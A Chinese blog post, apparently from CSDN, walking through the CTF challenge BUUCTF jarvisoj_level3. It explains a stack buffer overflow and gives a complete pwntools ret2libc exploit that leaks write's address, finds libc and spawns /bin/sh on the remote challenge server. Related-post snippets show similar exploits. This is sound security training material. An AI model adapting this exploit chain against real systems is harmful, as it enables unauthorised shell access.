[BUUCTF]PWN——jarvisoj_level3

最新推荐文章于 2024-07-11 19:14:54 发布
最新推荐文章于 2024-07-11 19:14:54 发布
阅读量1.2k 收藏 3
点赞数 1
分类专栏: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/BangSen1/article/details/114854465
版权

jarvisoj_level3

32位,NX保护。
在这里插入图片描述
运行程序。
在这里插入图片描述
用IDA打开,shift+f12检索 ,找到关键函数。
在这里插入图片描述
参数buf溢出漏洞,利用ret2libc获取shell。
1,利用write函数泄露libc版本

write_plt=elf.plt['write']
write_got=elf.got['write']

payload='a'*(0x88+4)+p32(write_plt)+p32(main)+p32(1)+p32(write_got)+p32(4)

r.recvuntil('Input:\n')
r.sendline(payload)
write_addr=u32(r.recv(4))

函数里已经调用了write函数,所以直接获取对应表里对应函数地址;构建payload。
在这里插入图片描述
返回地址写上main是因为要让程序再执行了一次
write_addr=u32(r.recv(4))
接收lib版本,recv(4)表示接收4字节,u32是32位程序的解包函数

2,计算libc基址,算出system和bin/sh在程序里的地址

libc=LibcSearcher('write',write_addr)
libc_base=write_addr-libc.dump('write')
system=libc_base+libc.dump('system')
sh=libc_base+libc.dump('str_bin_sh')

libc=LibcSearcher(‘write’,write_addr)
调用libcsearcher库匹配对应的libc版本
因为:函数地址=libc库地址+偏移量
所以:libc_base=write_addr-libc.dump(‘write’);
有了偏移量就可以用libc库函数地址+偏移量计算出程序里的函数地址;
再计算system函数和bin/sh:
system=libc_base+libc.dump(‘system’)
sh=libc_base+libc.dump(‘str_bin_sh’)
3.构造rop,执行system(‘/bin/sh’)

payload='a'*(0x88+4)+p32(system)+p32(main)+p32(sh)
r.recvuntil('Input:\n')
r.sendline(payload)

from pwn import *
from LibcSearcher import *

r=remote('node3.buuoj.cn',25873)
elf=ELF('./level3')

main=0x804844B
write_plt=elf.plt['write']
write_got=elf.got['write']

payload='a'*(0x88+4)+p32(write_plt)+p32(main)+p32(1)+p32(write_got)+p32(4)

r.recvuntil('Input:\n')
r.sendline(payload)
write_addr=u32(r.recv(4))

libc=LibcSearcher('write',write_addr)
libc_base=write_addr-libc.dump('write')
system=libc_base+libc.dump('system')
sh=libc_base+libc.dump('str_bin_sh')

payload='a'*(0x88+4)+p32(system)+p32(main)+p32(sh)
r.recvuntil('Input:\n')
r.sendline(payload)
r.interactive()

来自师兄的讲解

HAIANAWEI
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[BUUCTF]PWN-jarvisoj_level4
红凳子的博客
04-07 409
[BUUCTF]PWN-jarvisoj_level4前言一、程序分析二、漏洞利用方法一:使用LibcSearcher寻找libc版本方法二:使用DynELF函数进行泄露 前言 在这篇文章中将学习到劫持read函数、使用LibcSearcher寻找libc版本和DynELF函数的使用 提示:以下是本篇文章正文内容,下面案例可供参考 一、程序分析 从中可以看出,32位程序,i386架构,开启了NX保护。 输入点在vulnerable_function里,read试图向长度0x88的地址空间写入0x10
BUUCTF_jarvisoj_level1
qq_39869547的博客
02-06 976
和原题的差别在于,远程不回显栈地址。直接常规栈溢出即可 #!/usr/bin/env python # -*- coding: utf-8 -*- from pwn import * from LibcSearcher import * elf = ELF("./level1") shellcode = asm(shellcraft.sh()) io = remote("node3.buuoj.c...
BUUCTF--pwn--jarvisoj_level3【ret2libc】
qq_73149934的博客
12-04 303
BUUCTF--pwn--jarvisoj_level3
BUUCTF-jarvisoj_level3
Rt1Text的博客
11-27 198
main很明显的溢出点再没有其它有用的信息,而且本题没有system,bin/sh既然如此,解决思路就有了,泄露libc,32位的ret2libc3。
jarvisoj_level3_x64解题
最新发布
2301_81504456的博客
07-11 356
X64系统中程序参数前六个保存在寄存器中。
BUUCTFjarvisoj_level3
m0_51251108的博客
12-28 347
BUUCTFjarvisoj_level3 标准的ret2libc 这里记一下找偏移的方法: readelf -a libc库文件|grep “puts” 或者用symbol这些 strings 文件 -tx|grep “/bin/sh” 抓出/bin/sh 可以找/bin/sh在libc中的地址 这里直接给出exp: from pwn import* r=remote('node3.buuoj.cn',28705) libc=ELF('./libc-2.23.so') elf=ELF('./
buuctf jarvisoj_level3(libc)
carol2358的博客
05-01 363
常规32位泄漏libc exp: from pwn import * from LibcSearcher import * local_file = './level3' local_libc = '/lib/x86_64-linux-gnu/libc-2.23.so' remote_libc = './libc.so.6' select = 1 if select == 0: ...
jarvisoj_typo
05-14
jarvisoj_typo,arm架构下的pwn题。
jarvisoj_add
05-14
jarvisoj_add,mips架构下的pwn题。
buuctf pwn ubuntu20的自己搭建运行环境
11-15
pwn ubuntu20的自己搭建运行环境具体情参考https://blog.csdn.net/weixin_41748164/article/details/127874334
PWN.zip_PWN控制舵机_pwn控制_pwn控制h桥_数字舵机_电机
07-14
pwm波输出,实现数字舵机的控制,完成一些简单的电机控制问题
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
BUUCTF(pwn)jarvisoj_level3_x64
半岛铁盒的博客
04-01 442
这道题是一道简单的rop类型的题目,跟之前做的题目有一些差异:( 这是64位的需要一些额外的操作 ) 64位汇编传参,当参数少于7个时, 参数从左到右放入寄存器: rdi, rsi, rdx, rcx, r8, r9。 当参数为7个以上时, 前 6 个与前面一样, 但后面的依次从 “右向左” 放入栈中,即和32位汇编一样。 这里我们使用 write 函数 来泄密 libc地址 ssize_t write(int fd,const void*buf,size_t count); 参数说明: f.
BUUCTF(pwn)jarvisoj_level3
半岛铁盒的博客
04-02 294
EXP from pwn import* from LibcSearcher import* r=remote('node3.buuoj.cn',25564) main=0x8048484 elf=ELF('./2') write_plt=elf.plt['write'] write_got=elf.got['write'] payload='a'*(0x88+4)+p32(write_plt)+p32(main)+p32(1)+p32(write_got)+p32(4) r.sendl..
BUUCTF pwn——jarvisoj_level3
CNS-Enterprise BCC-1701-J
04-21 171
BUUCTF 做题练习
BUUCTF----jarvisoj_level3_x64
qq_33010875的博客
09-26 460
环境:WSL2,ubuntu16.04,python2 checksec文件: 这道题level3的思路一样,只是32位的程序改成了64位。 也就是说,在利用write函数泄露出libc的基地址时,需要用到寄存器来穿参数,write有三个参数,所以需要rdi,rsi,rdx三个寄存器,通过命令: ROPgadget --binary level3_x64 |grep "pop" 结果: 从图中可以看到只找到了rdi和rsi寄存器,没有rdx寄存器 尝试gdb程序: 在read函数下断点,可以看到rd
[BUUCTF]PWN——jarvisoj_level3_x64
BangSen1的博客
03-17 242
jarvisoj_level3_x64 例行检查,64位,开启NX保护。 运行一下。 IDA打开,查看main函数 function()函数 buf溢出漏洞,read之前已经调用过write函数,利用它来泄露libc版本 64位程序在传参的时候要先用到rdi,rsi,rdx,rcx,r8,r9这几个寄存器,都满了之后才会在栈上传参 利用ROPgadget找一下设置寄存器的指令 rdi=0x4006b3 rsi_r15=0x4006b1 payload='a'*(0x80+8)+p64(rdi)+
BUUCTF jarvisoj_level3
红叶的博客
10-27 344
切入点从泄露write函数入手。栈溢出漏洞,ret2libc。IDA Pro 静态调试。
jarvisoj_level1
08-28
很抱歉,我无法回答这个问题。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [[BUUCTF-pwn]——jarvisoj_level1](https://blog.csdn.net/Y_peak/article/details/114916604)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* [个人网站大总结合集—持续更新,欢迎共享,不要白嫖哦](https://download.csdn.net/download/weixin_38708461/14885161)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值